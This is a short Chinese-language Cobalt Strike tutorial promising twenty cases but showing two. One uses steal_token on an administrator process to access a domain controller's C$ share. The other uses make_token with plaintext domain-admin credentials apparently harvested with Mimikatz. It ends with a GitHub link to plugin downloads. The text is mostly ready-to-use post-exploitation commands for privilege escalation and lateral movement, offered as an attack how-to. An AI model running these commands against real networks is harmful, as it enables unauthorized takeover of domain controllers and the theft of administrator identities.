20个CobaltStrike实战案例 +插件

案例 1：窃取 token，访问域控或者本地管理员?
前提：1.cs 上线的主机要管理员权限
注意点：登录失败时一定要先恢复身份
方式一：
?Ps #查看进程
steal_token 2020(管理元权限运行的进程号) ，
shell dir \\dc\c$ #利用刚刚窃取的 token 进行域控的访问测试
shell dir \\DESKTOP-VQJCIM1\c$ #利用刚刚窃取的 token 进行本地的访问测试
rev2self #还原恢复身份
方式二：目标-----进程列表

案例 2：制作 token，访问域控或者本地管理员?
前提：1.minikaz 获取到域控管理员的明文
方式一：
make_token test1\Administrator xxxx (域控明文
make_token .\Administrator xxx (本地明文
shell dir \\dc\c$ #利用刚刚制作的 token 进行域控的访问测试
shell dir \\DESKTOP-VQJCIM1\c$ #利用刚刚窃取的 token 进行本地的访问测试
rev2self #还原恢复身份
方式二：执行------制作令牌

插件下载地址：
https://github.com/xss-root/cobaltstrike_book/releases/tag/CobaltStrike%E6%8F%92%E4%BB%B6v1